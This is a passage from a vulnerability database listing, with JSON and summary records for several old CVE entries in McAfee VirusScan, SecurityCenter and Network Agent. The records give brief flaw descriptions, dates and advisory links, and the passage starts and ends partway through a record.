"x_transferred"
],
"url": "http://www.osvdb.org/6287"
},
{
"name": "1326",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/1326"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2000-06-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Mcafee VirusScan 4.03 does not properly restrict access to the alert text file before it is sent to the Central Alert Server, which allows local users to modify alerts in an arbitrary fashion."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2002-02-26T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "mcafee-alerting-dos(4641)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/4641"
},
{
"name": "20000607 Mcafee Alerting DOS vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html"
},
{
"name": "6287",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/6287"
},
{
"name": "1326",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/1326"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2000-0502",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Mcafee VirusScan 4.03 does not properly restrict access to the alert text file before it is sent to the Central Alert Server, which allows local users to modify alerts in an arbitrary fashion."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "mcafee-alerting-dos(4641)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/4641"
},
{
"name": "20000607 Mcafee Alerting DOS vulnerability",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html"
},
{
"name": "6287",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/6287"
},
{
"name": "1326",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/1326"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2000-0502",
"datePublished": "2003-04-02T05:00:00",
"dateReserved": "2000-07-11T00:00:00",
"dateUpdated": "2024-08-08T05:21:30.581Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-3575
Vulnerability from cvelistv5
Published
2006-07-13 10:00
Modified
2024-08-07 18:30
Severity ?
EPSS score ?
Summary
Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) "Process name", (2) "Module name", or (3) "API name" fields.
References
| ▼ | URL | Tags |
|---|---|---|
| http://securitytracker.com/id?1016450 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/archive/1/439430/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://securityreason.com/securityalert/1216 | third-party-advisory, x_refsource_SREASON | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/27625 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T18:30:34.517Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1016450",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1016450"
},
{
"name": "20060707 McAfee VirusScan Enterprise 8.0.0 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/439430/100/0/threaded"
},
{
"name": "1216",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/1216"
},
{
"name": "mcafee-virusscan-boprotection-dos(27625)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27625"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-07-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) \"Process name\", (2) \"Module name\", or (3) \"API name\" fields."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1016450",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1016450"
},
{
"name": "20060707 McAfee VirusScan Enterprise 8.0.0 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/439430/100/0/threaded"
},
{
"name": "1216",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/1216"
},
{
"name": "mcafee-virusscan-boprotection-dos(27625)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27625"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-3575",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) \"Process name\", (2) \"Module name\", or (3) \"API name\" fields."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1016450",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1016450"
},
{
"name": "20060707 McAfee VirusScan Enterprise 8.0.0 Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/439430/100/0/threaded"
},
{
"name": "1216",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/1216"
},
{
"name": "mcafee-virusscan-boprotection-dos(27625)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27625"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-3575",
"datePublished": "2006-07-13T10:00:00",
"dateReserved": "2006-07-12T00:00:00",
"dateUpdated": "2024-08-07T18:30:34.517Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2007-2584
Vulnerability from cvelistv5
Published
2007-05-09 22:00
Modified
2024-08-07 13:42
Severity ?
EPSS score ?
Summary
Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id?1018028 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/23888 | vdb-entry, x_refsource_BID | |
| http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528 | third-party-advisory, x_refsource_IDEFENSE | |
| http://osvdb.org/35874 | vdb-entry, x_refsource_OSVDB | |
| http://secunia.com/advisories/25173 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.vupen.com/english/advisories/2007/1717 | vdb-entry, x_refsource_VUPEN | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/34179 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/23909 | vdb-entry, x_refsource_BID | |
| http://ts.mcafeehelp.com/faq3.asp?docid=419189 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T13:42:33.407Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1018028",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018028"
},
{
"name": "23888",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/23888"
},
{
"name": "20070508 McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528"
},
{
"name": "35874",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/35874"
},
{
"name": "25173",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25173"
},
{
"name": "ADV-2007-1717",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/1717"
},
{
"name": "mcafee-mcsubmgr-activex-bo(34179)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34179"
},
{
"name": "23909",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/23909"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=419189"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1018028",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018028"
},
{
"name": "23888",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/23888"
},
{
"name": "20070508 McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528"
},
{
"name": "35874",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/35874"
},
{
"name": "25173",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25173"
},
{
"name": "ADV-2007-1717",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/1717"
},
{
"name": "mcafee-mcsubmgr-activex-bo(34179)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34179"
},
{
"name": "23909",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/23909"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=419189"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-2584",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1018028",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018028"
},
{
"name": "23888",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/23888"
},
{
"name": "20070508 McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528"
},
{
"name": "35874",
"refsource": "OSVDB",
"url": "http://osvdb.org/35874"
},
{
"name": "25173",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25173"
},
{
"name": "ADV-2007-1717",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/1717"
},
{
"name": "mcafee-mcsubmgr-activex-bo(34179)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34179"
},
{
"name": "23909",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/23909"
},
{
"name": "http://ts.mcafeehelp.com/faq3.asp?docid=419189",
"refsource": "CONFIRM",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=419189"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-2584",
"datePublished": "2007-05-09T22:00:00",
"dateReserved": "2007-05-09T00:00:00",
"dateUpdated": "2024-08-07T13:42:33.407Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2002-2282
Vulnerability from cvelistv5
Published
2007-10-18 10:00
Modified
2024-08-08 03:59
Severity ?
EPSS score ?
Summary
McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user's home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs.
References
| ▼ | URL | Tags |
|---|---|---|
| http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html | mailing-list, x_refsource_BUGTRAQ | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/10741 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/6288 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.459Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20021129 Potential Vuln in McAfee VirusScan 451",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html"
},
{
"name": "virusscan-webscanx-dll-execution(10741)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10741"
},
{
"name": "6288",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/6288"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-11-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user\u0027s home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20021129 Potential Vuln in McAfee VirusScan 451",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html"
},
{
"name": "virusscan-webscanx-dll-execution(10741)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10741"
},
{
"name": "6288",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/6288"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2282",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user\u0027s home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20021129 Potential Vuln in McAfee VirusScan 451",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html"
},
{
"name": "virusscan-webscanx-dll-execution(10741)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10741"
},
{
"name": "6288",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/6288"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2282",
"datePublished": "2007-10-18T10:00:00",
"dateReserved": "2007-10-17T00:00:00",
"dateUpdated": "2024-08-08T03:59:11.459Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2004-0831
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:31
Severity ?
EPSS score ?
Summary
McAfee VirusScan 4.5.1 does not drop SYSTEM privileges before allowing users to browse for files via the "System Scan" properties of the System Tray applet, which could allow local users to gain privileges.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/17367 | vdb-entry, x_refsource_XF | |
| http://www.idefense.com/application/poi/display?id=140&type=vulnerabilities | third-party-advisory, x_refsource_IDEFENSE | |
| http://marc.info/?l=bugtraq&m=109526269429728&w=2 | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:31:47.790Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "mcafee-virusscan-gain-privileges(17367)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17367"
},
{
"name": "20040914 McAfee VirusScan Privilege Escalation Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://www.idefense.com/application/poi/display?id=140\u0026type=vulnerabilities"
},
{
"name": "20040915 McAfee VirusScan Privilege Escalation Vulnerability [iDEFENSE]",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=109526269429728\u0026w=2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-09-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "McAfee VirusScan 4.5.1 does not drop SYSTEM privileges before allowing users to browse for files via the \"System Scan\" properties of the System Tray applet, which could allow local users to gain privileges."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "mcafee-virusscan-gain-privileges(17367)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17367"
},
{
"name": "20040914 McAfee VirusScan Privilege Escalation Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://www.idefense.com/application/poi/display?id=140\u0026type=vulnerabilities"
},
{
"name": "20040915 McAfee VirusScan Privilege Escalation Vulnerability [iDEFENSE]",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=109526269429728\u0026w=2"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-0831",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "McAfee VirusScan 4.5.1 does not drop SYSTEM privileges before allowing users to browse for files via the \"System Scan\" properties of the System Tray applet, which could allow local users to gain privileges."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "mcafee-virusscan-gain-privileges(17367)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17367"
},
{
"name": "20040914 McAfee VirusScan Privilege Escalation Vulnerability",
"refsource": "IDEFENSE",
"url": "http://www.idefense.com/application/poi/display?id=140\u0026type=vulnerabilities"
},
{
"name": "20040915 McAfee VirusScan Privilege Escalation Vulnerability [iDEFENSE]",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=109526269429728\u0026w=2"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-0831",
"datePublished": "2004-09-24T04:00:00",
"dateReserved": "2004-09-07T00:00:00",
"dateUpdated": "2024-08-08T00:31:47.790Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-5417
Vulnerability from cvelistv5
Published
2006-10-20 10:00
Modified
2024-08-07 19:48
Severity ?
EPSS score ?
Summary
McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/archive/1/448546/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://securitytracker.com/id?1017057 | vdb-entry, x_refsource_SECTRACK | |
| http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html | x_refsource_MISC | |
| http://www.securityfocus.com/bid/20496 | vdb-entry, x_refsource_BID | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/29501 | vdb-entry, x_refsource_XF | |
| http://secunia.com/advisories/22371 | third-party-advisory, x_refsource_SECUNIA | |
| http://securityreason.com/securityalert/1750 | third-party-advisory, x_refsource_SREASON |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T19:48:30.217Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20061012 Mcafee Network Agent (mcnasvc.exe) Remote DoS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"name": "1017057",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1017057"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"name": "20496",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/20496"
},
{
"name": "mcafee-mcnasvc-dos(29501)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
},
{
"name": "22371",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/22371"
},
{
"name": "1750",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/1750"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-10-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-17T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20061012 Mcafee Network Agent (mcnasvc.exe) Remote DoS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"name": "1017057",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1017057"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"name": "20496",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/20496"
},
{
"name": "mcafee-mcnasvc-dos(29501)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
},
{
"name": "22371",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/22371"
},
{
"name": "1750",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/1750"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-5417",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20061012 Mcafee Network Agent (mcnasvc.exe) Remote DoS",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"name": "1017057",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1017057"
},
{
"name": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html",
"refsource": "MISC",
